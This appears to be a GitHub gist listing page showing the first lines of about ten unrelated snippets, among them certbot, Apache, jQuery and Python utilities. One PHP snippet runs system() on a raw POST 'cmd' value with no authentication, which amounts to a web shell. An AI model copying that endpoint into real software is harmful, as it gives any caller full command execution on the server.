This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
3x3 2D Matrix | |
[a c e] | |
[b d f] | |
[0 0 1] | |
*/ | |
var DOMException = require('domexception'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
javascript:(function($) { | |
var handlers = []; | |
if (typeof Shiny !== 'undefined') { | |
Shiny.addCustomMessageHandler("__EVAL__", function(data) { | |
handlers.forEach(function(handler) { | |
handler(data); | |
}); | |
}); | |
} | |
var index = 0; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ----------------------------------------------------------------------------- | |
// Copyright (c) 2018 Jakub Jankiewicz | |
// Released under MIT license | |
// | |
// generic namespace generator the constructor should declare private functions | |
// and variables and return public api, the module is created when all dependecies | |
// are resolved (all modules are created) | |
// | |
// @param namespace dot separated namespace that will be added to window object | |
// @param dependencies array of string (dependencies) can be empty array |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
output=$(mktemp); | |
sudo certbot certonly --manual --expand --manual-public-ip-logging-ok \ | |
--preferred-challenges http -n \ | |
-d <LIST OF COMMA SEPARATED DOMAINS AND SUBDOMAINS>\ | |
--manual-auth-hook ./cert.py --agree-tos --email <EMAIL ADRESS> 2>&1 | tee $output | |
grep "Certificate not yet due for renewal" $output > /dev/null || \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import socket | |
import re | |
import os | |
import threading | |
header_re = re.compile(r"(GET|POST) ([^ ]+) HTTP/", re.I) | |
def status(code): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$.fn.css = (function(css) { | |
return function fn(key, value) { | |
var self = this; | |
if (arguments.length == 1 && $.isPlainObject(arguments[0])) { | |
var data = arguments[0]; | |
Object.keys(data).forEach(function(key) { | |
fn.call(self, key, data[key]); | |
}); | |
} else if (key.match(/^\s*--/)) { | |
if (typeof value === 'undefined') { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
emcc -o main.html -s FETCH=1 -s NO_EXIT_RUNTIME=0 main.c |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
RewriteEngine on | |
RewriteCond %{SCRIPT_FILENAME} !-f | |
RewriteCond %{SCRIPT_FILENAME} !-d | |
RewriteRule (.*) /index.php?$1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && | |
$_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' && isset($_POST['cmd'])) { | |
system($_POST['cmd']); | |
exit(); | |
} | |
?> | |
<!DOCTYPE html> | |
<html> | |
<head> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import git | |
import json | |
import sqlite3 | |
import re | |
import os | |
import os.path | |
def log(repo): |